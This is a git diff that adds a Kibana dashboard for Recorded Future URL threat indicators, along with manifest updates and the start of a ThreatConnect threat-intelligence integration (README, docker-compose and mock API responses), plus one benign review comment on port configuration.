@@ -0,0 +1,870 @@ +{ + "attributes": { + "controlGroupInput": { + "chainingSystem": "HIERARCHICAL", + "controlStyle": "oneLine", + "ignoreParentSettingsJSON": "{\"ignoreFilters\":false,\"ignoreQuery\":false,\"ignoreTimerange\":false,\"ignoreValidations\":false}", + "panelsJSON": "{\"07207a42-fb5d-4d37-b679-30845c08928d\":{\"type\":\"optionsListControl\",\"order\":0,\"grow\":true,\"width\":\"medium\",\"explicitInput\":{\"id\":\"07207a42-fb5d-4d37-b679-30845c08928d\",\"fieldName\":\"threat.indicator.provider\",\"title\":\"Provider\",\"grow\":true,\"width\":\"medium\",\"enhancements\":{}}},\"9dd2a48b-ebb5-44bf-8d45-087c1082723b\":{\"type\":\"optionsListControl\",\"order\":1,\"grow\":true,\"width\":\"medium\",\"explicitInput\":{\"id\":\"9dd2a48b-ebb5-44bf-8d45-087c1082723b\",\"fieldName\":\"threat.indicator.type\",\"title\":\"Indicator Type\",\"grow\":true,\"width\":\"medium\",\"enhancements\":{}}},\"6651cf6e-c85a-41ea-bfe2-b8bbd4fee9c9\":{\"type\":\"optionsListControl\",\"order\":2,\"grow\":true,\"width\":\"medium\",\"explicitInput\":{\"id\":\"6651cf6e-c85a-41ea-bfe2-b8bbd4fee9c9\",\"fieldName\":\"recordedfuture.list\",\"title\":\"Risk List\",\"grow\":true,\"width\":\"medium\",\"enhancements\":{}}}}" + }, + "description": "Dashboard providing statistics about URL type indicators from the RecordedFuture integration", + "kibanaSavedObjectMeta": { + "searchSourceJSON": { + "filter": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", + "key": "event.dataset", + "negate": false, + "params": [ + "ti_recordedfuture.threat" + ], + "type": "phrases" + }, + "query": { + "bool": { + "minimum_should_match": 1, + "should": [ + { + "match_phrase": { + "event.dataset": "ti_recordedfuture.threat" + } + } + ] + } + } + }, + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "indexRefName": 
"kibanaSavedObjectMeta.searchSourceJSON.filter[1].meta.index", + "key": "threat.indicator.type", + "negate": false, + "params": { + "query": "url" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "threat.indicator.type": "url" + } + } + }, + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "labels.is_ioc_transform_source", + "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.filter[2].meta.index", + "key": "labels.is_ioc_transform_source", + "negate": true, + "params": { + "query": "true" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "labels.is_ioc_transform_source": "true" + } + } + } + ], + "query": { + "language": "kuery", + "query": "" + } + } + }, + "optionsJSON": { + "hidePanelTitles": false, + "syncColors": false, + "syncCursor": true, + "syncTooltips": false, + "useMargins": true + }, + "panelsJSON": [ + { + "embeddableConfig": { + "enhancements": {}, + "hidePanelTitles": true, + "savedVis": { + "data": { + "aggs": [], + "searchSource": { + "filter": [], + "query": { + "language": "kuery", + "query": "" + } + } + }, + "description": "", + "id": "", + "params": { + "fontSize": 12, + "markdown": "**Navigation**\n\n[RecordedFuture Overview](/app/dashboards#/view/ti_recordedfuture-57ab05de-cd7e-4779-9201-1e099f7ab23b) \n[RecordedFuture Files](/app/dashboards#/view/ti_recordedfuture-554321f4-a649-49da-a5ce-b3dfef1a179b) \n**[RecordedFuture URLs (This Page)](/app/dashboards#/view/ti_recordedfuture-ea3dd012-69d8-423d-81b1-2ad9174c75d3)** \n\n[Integrations Page](/app/integrations/detail/ti_recordedfuture/overview)\n\n\n**Overview**\n\nThis dashboard is an overview of the different threat intelligence indicators with a **threat.indicator.type: url**. 
\n\nThe dashboard is made to provide general statistics and show the health of your indicators like popular domains, file extensions, statistics about how many unique indicators are ingested and other relevant information.", + "openLinksInNewTab": false + }, + "title": "", + "type": "markdown", + "uiState": {} + } + }, + "gridData": { + "h": 39, + "i": "c5b7a2b8-96dc-4c87-9022-334ca5536f1b", + "w": 7, + "x": 0, + "y": 0 + }, + "panelIndex": "c5b7a2b8-96dc-4c87-9022-334ca5536f1b", + "title": "Files Navigation Textbox [Logs AbuseCH]", + "type": "visualization" + }, + { + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-88a112e1-6da1-49d3-9177-19f98280c200", + "type": "index-pattern" + } + ], + "state": { + "datasourceStates": { + "formBased": { + "layers": { + "88a112e1-6da1-49d3-9177-19f98280c200": { + "columnOrder": [ + "604f1693-15a6-437d-af69-03588db8e471" + ], + "columns": { + "604f1693-15a6-437d-af69-03588db8e471": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Unique Ports", + "operationType": "unique_count", + "scale": "ratio", + "sourceField": "threat.indicator.url.port" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "accessor": "604f1693-15a6-437d-af69-03588db8e471", + "layerId": "88a112e1-6da1-49d3-9177-19f98280c200", + "layerType": "data", + "size": "xl", + "textAlign": "center", + "titlePosition": "bottom" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsLegacyMetric" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 8, + "i": "8fac2020-b4cf-4267-b361-7ef813948d1a", + "w": 6, + "x": 7, + "y": 0 + }, + "panelIndex": "8fac2020-b4cf-4267-b361-7ef813948d1a", + "title": "Unique Ports [Logs 
RecordedFuture]", + "type": "lens" + }, + { + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-a6fa56f8-32fa-405d-8771-dade4fe75d62", + "type": "index-pattern" + } + ], + "state": { + "datasourceStates": { + "formBased": { + "layers": { + "a6fa56f8-32fa-405d-8771-dade4fe75d62": { + "columnOrder": [ + "848c463b-bbc1-4b6a-af3e-76d844eb3cc5" + ], + "columns": { + "848c463b-bbc1-4b6a-af3e-76d844eb3cc5": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Unique Extensions", + "operationType": "unique_count", + "scale": "ratio", + "sourceField": "threat.indicator.url.extension" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "accessor": "848c463b-bbc1-4b6a-af3e-76d844eb3cc5", + "layerId": "a6fa56f8-32fa-405d-8771-dade4fe75d62", + "layerType": "data", + "size": "xl", + "textAlign": "center", + "titlePosition": "bottom" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsLegacyMetric" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 8, + "i": "b14ba9f4-6432-494d-a325-d1bf37e93425", + "w": 6, + "x": 13, + "y": 0 + }, + "panelIndex": "b14ba9f4-6432-494d-a325-d1bf37e93425", + "title": "Unique File Extensions [Logs RecordedFuture]", + "type": "lens" + }, + { + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-c94400ee-a135-4a99-9693-5879d29f7aad", + "type": "index-pattern" + } + ], + "state": { + "datasourceStates": { + "formBased": { + "layers": { + "c94400ee-a135-4a99-9693-5879d29f7aad": { + "columnOrder": [ + 
"2934249f-fce5-4637-87ff-d2596d1b6ec5" + ], + "columns": { + "2934249f-fce5-4637-87ff-d2596d1b6ec5": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Unique Domains", + "operationType": "unique_count", + "scale": "ratio", + "sourceField": "threat.indicator.url.domain" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "accessor": "2934249f-fce5-4637-87ff-d2596d1b6ec5", + "layerId": "c94400ee-a135-4a99-9693-5879d29f7aad", + "layerType": "data", + "size": "xl", + "textAlign": "center", + "titlePosition": "bottom" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsLegacyMetric" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 8, + "i": "d3f03987-e3a6-44bc-a784-c92f99bc20a9", + "w": 6, + "x": 19, + "y": 0 + }, + "panelIndex": "d3f03987-e3a6-44bc-a784-c92f99bc20a9", + "title": "Unique Domains [Logs RecordedFuture]", + "type": "lens" + }, + { + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-9fa49c4c-5544-472d-afce-e51d6a5687fe", + "type": "index-pattern" + } + ], + "state": { + "datasourceStates": { + "formBased": { + "layers": { + "9fa49c4c-5544-472d-afce-e51d6a5687fe": { + "columnOrder": [ + "15e2b5ad-2040-4253-89a6-60f085c66f86", + "b9a631fe-5f49-4db2-a076-bcbf5410aec9" + ], + "columns": { + "15e2b5ad-2040-4253-89a6-60f085c66f86": { + "dataType": "string", + "isBucketed": true, + "label": "Top values of threat.indicator.url.extension", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "columnId": "b9a631fe-5f49-4db2-a076-bcbf5410aec9", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "size": 10 + }, + "scale": "ordinal", + "sourceField": 
"threat.indicator.url.extension" + }, + "b9a631fe-5f49-4db2-a076-bcbf5410aec9": { + "dataType": "number", + "isBucketed": false, + "label": "Count of records", + "operationType": "count", + "scale": "ratio", + "sourceField": "___records___" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "layers": [ + { + "categoryDisplay": "default", + "layerId": "9fa49c4c-5544-472d-afce-e51d6a5687fe", + "layerType": "data", + "legendDisplay": "default", + "legendSize": "auto", + "metrics": [ + "b9a631fe-5f49-4db2-a076-bcbf5410aec9" + ], + "nestedLegend": false, + "numberDisplay": "percent", + "primaryGroups": [ + "15e2b5ad-2040-4253-89a6-60f085c66f86", + "15e2b5ad-2040-4253-89a6-60f085c66f86" + ] + } + ], + "shape": "treemap" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsPie" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 23, + "i": "d82d97ed-5e31-49b0-9bcb-04485bb31606", + "w": 23, + "x": 25, + "y": 0 + }, + "panelIndex": "d82d97ed-5e31-49b0-9bcb-04485bb31606", + "title": "Most Popular File Extensions [Logs RecordedFuture]", + "type": "lens" + }, + { + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-0f63318a-a857-4d83-89ce-a94e2242b79e", + "type": "index-pattern" + } + ], + "state": { + "datasourceStates": { + "formBased": { + "layers": { + "0f63318a-a857-4d83-89ce-a94e2242b79e": { + "columnOrder": [ + "df0791a6-247c-4434-a43a-fdea7577ca34", + "77a48096-02aa-4b7a-8a7b-131fc38988bd" + ], + "columns": { + "77a48096-02aa-4b7a-8a7b-131fc38988bd": { + "dataType": "number", + "isBucketed": false, + "label": "Count of records", + "operationType": "count", + "scale": "ratio", + "sourceField": "___records___" + }, + 
"df0791a6-247c-4434-a43a-fdea7577ca34": { + "dataType": "string", + "isBucketed": true, + "label": "Top values of threat.indicator.url.scheme", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "columnId": "77a48096-02aa-4b7a-8a7b-131fc38988bd", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "size": 5 + }, + "scale": "ordinal", + "sourceField": "threat.indicator.url.scheme" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "layers": [ + { + "categoryDisplay": "default", + "layerId": "0f63318a-a857-4d83-89ce-a94e2242b79e", + "layerType": "data", + "legendDisplay": "show", + "legendSize": "auto", + "metrics": [ + "77a48096-02aa-4b7a-8a7b-131fc38988bd" + ], + "nestedLegend": false, + "numberDisplay": "percent", + "primaryGroups": [ + "df0791a6-247c-4434-a43a-fdea7577ca34" + ] + } + ], + "shape": "donut" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsPie" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 15, + "i": "c14accd4-c14c-456b-bb88-815a24eb84d1", + "w": 18, + "x": 7, + "y": 8 + }, + "panelIndex": "c14accd4-c14c-456b-bb88-815a24eb84d1", + "title": "Percentage of URL Schema used [Logs RecordedFuture]", + "type": "lens" + }, + { + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-db89074c-e1fe-4091-bdb1-e42a36e82bac", + "type": "index-pattern" + } + ], + "state": { + "datasourceStates": { + "formBased": { + "layers": { + "db89074c-e1fe-4091-bdb1-e42a36e82bac": { + "columnOrder": [ + "b284ea2a-a2cd-4d08-bf44-fc73c08b5694", + "7ca1ac0b-2060-4431-a4b9-ec470af4448c" + ], + "columns": { + "7ca1ac0b-2060-4431-a4b9-ec470af4448c": { + "customLabel": true, + "dataType": "number", + 
"isBucketed": false, + "label": "Count", + "operationType": "count", + "scale": "ratio", + "sourceField": "___records___" + }, + "b284ea2a-a2cd-4d08-bf44-fc73c08b5694": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Domains", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "columnId": "7ca1ac0b-2060-4431-a4b9-ec470af4448c", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": false, + "size": 10 + }, + "scale": "ordinal", + "sourceField": "threat.indicator.url.domain" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "columns": [ + { + "columnId": "7ca1ac0b-2060-4431-a4b9-ec470af4448c", + "isTransposed": false + }, + { + "columnId": "b284ea2a-a2cd-4d08-bf44-fc73c08b5694", + "isTransposed": false + } + ], + "layerId": "db89074c-e1fe-4091-bdb1-e42a36e82bac", + "layerType": "data", + "rowHeight": "single", + "rowHeightLines": 1 + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsDatatable" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 16, + "i": "9ae5cf7f-7781-4826-bd47-8658192993b0", + "w": 18, + "x": 7, + "y": 23 + }, + "panelIndex": "9ae5cf7f-7781-4826-bd47-8658192993b0", + "title": "Most Popular Domains [Logs RecordedFuture]", + "type": "lens" + }, + { + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-9fa49c4c-5544-472d-afce-e51d6a5687fe", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "currentIndexPatternId": "logs-*", + "layers": { + "9fa49c4c-5544-472d-afce-e51d6a5687fe": { + "columnOrder": [ + "15e2b5ad-2040-4253-89a6-60f085c66f86", + "b9a631fe-5f49-4db2-a076-bcbf5410aec9" + ], + "columns": { + "15e2b5ad-2040-4253-89a6-60f085c66f86": { + "dataType": "string", + "isBucketed": true, + 
"label": "Top values of threat.indicator.url.extension", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "columnId": "b9a631fe-5f49-4db2-a076-bcbf5410aec9", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "size": 10 + }, + "scale": "ordinal", + "sourceField": "threat.indicator.url.extension" + }, + "b9a631fe-5f49-4db2-a076-bcbf5410aec9": { + "dataType": "number", + "isBucketed": false, + "label": "Count of records", + "operationType": "count", + "scale": "ratio", + "sourceField": "___records___" + } + }, + "incompleteColumns": {}, + "indexPatternId": "logs-*" + } + } + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "layers": [ + { + "categoryDisplay": "default", + "layerId": "9fa49c4c-5544-472d-afce-e51d6a5687fe", + "layerType": "data", + "legendDisplay": "show", + "legendSize": "auto", + "metrics": [ + "b9a631fe-5f49-4db2-a076-bcbf5410aec9" + ], + "nestedLegend": false, + "numberDisplay": "percent", + "primaryGroups": [ + "15e2b5ad-2040-4253-89a6-60f085c66f86" + ] + } + ], + "shape": "donut" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsPie" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 16, + "i": "c7f8fe13-3e6b-49f6-afeb-420b84a1ff2f", + "w": 23, + "x": 25, + "y": 23 + }, + "panelIndex": "c7f8fe13-3e6b-49f6-afeb-420b84a1ff2f", + "title": "Most Popular File Extensions % [Logs RecordedFuture]", + "type": "lens" + } + ], + "timeRestore": false, + "title": "[Logs RecordedFuture] URLs", + "version": 1 + }, + "coreMigrationVersion": "8.8.0", + "created_at": "2024-03-29T11:52:55.463Z", + "id": "ti_recordedfuture-ea3dd012-69d8-423d-81b1-2ad9174c75d3", + "managed": false, + "references": [ + { + "id": "logs-*", + "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": 
"kibanaSavedObjectMeta.searchSourceJSON.filter[1].meta.index", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[2].meta.index", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "8fac2020-b4cf-4267-b361-7ef813948d1a:indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "8fac2020-b4cf-4267-b361-7ef813948d1a:indexpattern-datasource-layer-88a112e1-6da1-49d3-9177-19f98280c200", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "b14ba9f4-6432-494d-a325-d1bf37e93425:indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "b14ba9f4-6432-494d-a325-d1bf37e93425:indexpattern-datasource-layer-a6fa56f8-32fa-405d-8771-dade4fe75d62", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "d3f03987-e3a6-44bc-a784-c92f99bc20a9:indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "d3f03987-e3a6-44bc-a784-c92f99bc20a9:indexpattern-datasource-layer-c94400ee-a135-4a99-9693-5879d29f7aad", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "d82d97ed-5e31-49b0-9bcb-04485bb31606:indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "d82d97ed-5e31-49b0-9bcb-04485bb31606:indexpattern-datasource-layer-9fa49c4c-5544-472d-afce-e51d6a5687fe", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "c14accd4-c14c-456b-bb88-815a24eb84d1:indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "c14accd4-c14c-456b-bb88-815a24eb84d1:indexpattern-datasource-layer-0f63318a-a857-4d83-89ce-a94e2242b79e", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "9ae5cf7f-7781-4826-bd47-8658192993b0:indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": 
"9ae5cf7f-7781-4826-bd47-8658192993b0:indexpattern-datasource-layer-db89074c-e1fe-4091-bdb1-e42a36e82bac", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "c7f8fe13-3e6b-49f6-afeb-420b84a1ff2f:indexpattern-datasource-layer-9fa49c4c-5544-472d-afce-e51d6a5687fe", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "controlGroup_07207a42-fb5d-4d37-b679-30845c08928d:optionsListDataView", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "controlGroup_9dd2a48b-ebb5-44bf-8d45-087c1082723b:optionsListDataView", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "controlGroup_6651cf6e-c85a-41ea-bfe2-b8bbd4fee9c9:optionsListDataView", + "type": "index-pattern" + }, + { + "id": "ti_recordedfuture-security-solution-default", + "name": "tag-ref-ti_recordedfuture-security-solution-default", + "type": "tag" + }, + { + "id": "ti_recordedfuture-security-solution-default", + "name": "tag-ref-security-solution-default", + "type": "tag" + } + ], + "type": "dashboard", + "typeMigrationVersion": "8.9.0" +} \ No newline at end of file diff --git a/packages/ti_recordedfuture/kibana/tag/ti_recordedfuture-security-solution-default.json b/packages/ti_recordedfuture/kibana/tag/ti_recordedfuture-security-solution-default.json new file mode 100644 index 00000000000..243dab7b015 --- /dev/null +++ b/packages/ti_recordedfuture/kibana/tag/ti_recordedfuture-security-solution-default.json @@ -0,0 +1,14 @@ +{ + "attributes": { + "color": "#FEC514", + "description": "Tag defined in package-spec", + "name": "Security Solution" + }, + "coreMigrationVersion": "8.8.0", + "created_at": "2024-03-29T11:07:43.062Z", + "id": "ti_recordedfuture-security-solution-default", + "managed": false, + "references": [], + "type": "tag", + "typeMigrationVersion": "8.0.0" +} \ No newline at end of file diff --git a/packages/ti_recordedfuture/manifest.yml b/packages/ti_recordedfuture/manifest.yml index 0ade47c0b91..ebc5e64dca3 100644 
--- a/packages/ti_recordedfuture/manifest.yml
+++ b/packages/ti_recordedfuture/manifest.yml
@@ -1,13 +1,26 @@
 name: ti_recordedfuture
 title: Recorded Future
-version: "1.20.2"
+version: "1.23.0"
 description: Ingest threat intelligence indicators from Recorded Future risk lists with Elastic Agent.
 type: integration
-format_version: 3.0.0
+format_version: 3.0.2
 categories: ["security", "threat_intel"]
 conditions:
   kibana:
-    version: ^8.8.0
+    version: ^8.12.0
+screenshots:
+  - src: /img/rf-overview.png
+    title: "Dashboard: RecordedFuture Overview"
+    size: 1280x1329
+    type: image/png
+  - src: /img/rf-files.png
+    title: "Dashboard: RecordedFuture Files"
+    size: 1280x1329
+    type: image/png
+  - src: /img/rf-urls.png
+    title: "Dashboard: RecordedFuture URLs"
+    size: 1280x1329
+    type: image/png
 icons:
   - src: /img/logo.svg
     title: Recorded Future
diff --git a/packages/ti_threatconnect/_dev/build/build.yml b/packages/ti_threatconnect/_dev/build/build.yml
new file mode 100644
index 00000000000..71f48ba2a9c
--- /dev/null
+++ b/packages/ti_threatconnect/_dev/build/build.yml
@@ -0,0 +1,4 @@
+dependencies:
+  ecs:
+    reference: "git@v8.11.0"
+    import_mappings: true
diff --git a/packages/ti_threatconnect/_dev/build/docs/README.md b/packages/ti_threatconnect/_dev/build/docs/README.md
new file mode 100644
index 00000000000..6e963366896
--- /dev/null
+++ b/packages/ti_threatconnect/_dev/build/docs/README.md
@@ -0,0 +1,82 @@
+# ThreatConnect
+
+ThreatConnect is a widely used Threat Intelligence Platform (TIP) designed to assist organizations in aggregating, analyzing, and sharing information related to cybersecurity threats. The platform provides tools and features that enable security teams to collaborate on threat intelligence, manage incidents, and make informed decisions to enhance their overall cybersecurity posture. This ThreatConnect integration enables you to consume and analyze ThreatConnect data within Elastic Security, including indicator events, providing you with visibility and context for your cloud environments within Elastic Security.
+
+## Data streams
+
+The ThreatConnect integration collects a single type of data: Indicator.
+
+**Indicator** is used to retrieve atomic piece of information that has some intelligence value via the [ThreatConnect](https://docs.threatconnect.com/en/latest/rest_api/v3/indicators/indicators.html)
+
+Reference for [REST APIs](https://docs.threatconnect.com/en/latest/rest_api/rest_api.html#getting-started) of ThreatConnect.
+
+## Requirements
+
+Elastic Agent must be installed. For more information, refer to the link [here](https://www.elastic.co/guide/en/fleet/current/elastic-agent-installation.html).
+
+### Installing and managing an Elastic Agent:
+
+You have a few options for installing and managing an Elastic Agent:
+
+### Install a Fleet-managed Elastic Agent (recommended):
+
+With this approach, you install Elastic Agent and use Fleet in Kibana to define, configure, and manage your agents in a central location. We recommend using Fleet management because it makes the management and upgrade of your agents considerably easier.
+
+### Install Elastic Agent in standalone mode (advanced users):
+
+With this approach, you install Elastic Agent and manually configure the agent locally on the system where it’s installed. You are responsible for managing and upgrading the agents. This approach is reserved for advanced users only.
+
+### Install Elastic Agent in a containerized environment:
+
+You can run Elastic Agent inside a container, either with Fleet Server or standalone. Docker images for all versions of Elastic Agent are available from the Elastic Docker registry, and we provide deployment manifests for running on Kubernetes.
+
+There are some minimum requirements for running Elastic Agent and for more information, refer to the link [here](https://www.elastic.co/guide/en/fleet/current/elastic-agent-installation.html).
+
+The minimum **kibana.version** required is **8.11.0**.
+This module has been tested against the **ThreatConnect API Version v3**.
+The minimum required ThreatConnect Platform version needs to be **7.3.1**.
+
+## Setup
+
+### To collect data from ThreatConnect, the following parameters from your ThreatConnect instance are required:
+
+1. Access Id
+2. Secret Key
+3. URL
+
+To create an API user account, please refer to [this](https://knowledge.threatconnect.com/docs/creating-user-accounts) article.
+
+### Enabling the integration in Elastic:
+1. In Kibana, go to Management > Integrations.
+2. In the "Search for integrations" search bar, type ThreatConnect.
+3. Click on the "ThreatConnect" integration from the search results.
+4. Click on the "Add ThreatConnect" button to add the integration.
+5. Configure all required integration parameters, including Access Id, Secret Key, and URL, to enable data collection from the ThreatConnect REST API.
+6. Save the integration.
+
+## Indicators Expiration
+
+The ingested indicators expire after certain duration. An [Elastic Transform](https://www.elastic.co/guide/en/elasticsearch/reference/current/transforms.html) is created to faciliate only active indicators be available to the end users. Since we want to retain only valuable information and avoid duplicated data, the ThreatConnect Elastic integration forces the intel indicators to rotate into a custom index called: `logs-ti_threatconnect_latest.dest_indicator-*`.
+**Please, refer to this index in order to set alerts and so on.**
+
+#### Handling Orphaned Indicators
+
+Some ThreatConnect indicators may never expire and will continue to stay in the latest destination index. To avoid any false positives from such orphaned indicators, users are allowed to configure `IOC Expiration Duration` parameter while setting up the integration. This parameter deletes all data inside the destination index `logs-ti_threatconnect_latest.dest_indicator` after this specified duration is reached. Users must pull entire feed instead of incremental feed when this expiration happens so that the indicators get reset.
+
+### How it works
+
+This is possible thanks to a transform rule installed along with the integration. The transform rule parses the data stream content that is pulled from ThreatConnect and only adds new indicators.
+
+Both the data stream and the latest index have applied expiration through ILM and a retention policy in the transform respectively.
+
+## Logs Reference
+
+### Indicator
+
+This is the `Indicator` dataset.
+
+#### Example
+
+{{event "indicator"}}
+
+{{fields "indicator"}}
diff --git a/packages/ti_threatconnect/_dev/deploy/docker/docker-compose.yml b/packages/ti_threatconnect/_dev/deploy/docker/docker-compose.yml
new file mode 100644
index 00000000000..7654298669f
--- /dev/null
+++ b/packages/ti_threatconnect/_dev/deploy/docker/docker-compose.yml
@@ -0,0 +1,15 @@
+version: '2.3'
+services:
+  threatconnect-indicator:
+    image: docker.elastic.co/observability/stream:v0.13.0
+    hostname: threatconnect-indicator
+    ports:
+      - 8090
+    volumes:
+      - ./files:/files:ro
+    environment:
+      PORT: '8090'
+    command:
+      - http-server
+      - --addr=:8090
+      - --config=/files/config-indicator.yml
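Review bot: The listen port 8090 is spelled out three times in the threatconnect-indicator service (`ports`, `environment.PORT`, and the `--addr=:8090` argument), so a later change to one of them will silently leave the others behind. `PORT` appears to duplicate what `--addr` already sets, and nothing in the hunk says which of the two the image honours. If both are genuinely needed, a one-line comment above `environment:` such as `# PORT, --addr and the published port must agree` keeps them from drifting; otherwise drop the redundant one. Mounting `./files` read-only is appropriate since the mock responses are static.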
diff --git a/packages/ti_threatconnect/_dev/deploy/docker/files/config-indicator.yml b/packages/ti_threatconnect/_dev/deploy/docker/files/config-indicator.yml
new file mode 100644
index 00000000000..ef2b12fa46b
--- /dev/null
+++ b/packages/ti_threatconnect/_dev/deploy/docker/files/config-indicator.yml
@@ -0,0 +1,678 @@ +rules: + - path: /api/v3/indicators + methods: ["GET"] + query_params: + resultStart: 0 + resultLimit: 2 + responses: + - status_code: 200 + headers: + Content-Type: + - application/json + body: |- + { + "next": "abcd", + "data": [ + { + "id": 738667, + "dateAdded": "2023-08-24T06:28:17Z", + "securityLabels": { + "data": [ + { + "id": 3, + "name": "TLP:AMBER", + "description": "This security label is used for information that requires support to be effectively acted upon, yet carries risks to privacy, reputation, or operations if shared outside of the organizations involved. Information with this label can be shared with members of an organization and its clients.", + "color": "FFC000", + "owner": "System", + "dateAdded": "2016-08-31T00:00:00Z" + } + ] + }, + "ownerId": 51, + "ownerName": "Elastic", + "webLink": "https://app.threatconnect.com/#/details/indicators/738667/overview", + "tags": { + "data": [ + { + "id": 463701, + "name": "Financial Theft", + "description": "Adversaries may steal monetary resources from targets through extortion, social engineering, technical theft, or other methods aimed at their own financial gain at the expense of the availability of these resources for victims. Financial theft is the ultimate objective of several popular campaign types including extortion by ransomware,(Citation: FBI-ransomware) business email compromise (BEC) and fraud,(Citation: FBI-BEC) \"pig butchering,\"(Citation: wired-pig butchering) bank hacking,(Citation: DOJ-DPRK Heist) and exploiting cryptocurrency networks.(Citation: BBC-Ronin) \n\nAdversaries may [Compromise Accounts](https://attack.mitre.org/techniques/T1586) to conduct unauthorized transfers of funds.(Citation: Internet crime report 2022) In the case of business email compromise or email fraud, an adversary may utilize [Impersonation](https://attack.mitre.org/techniques/T1656) of a trusted entity. 
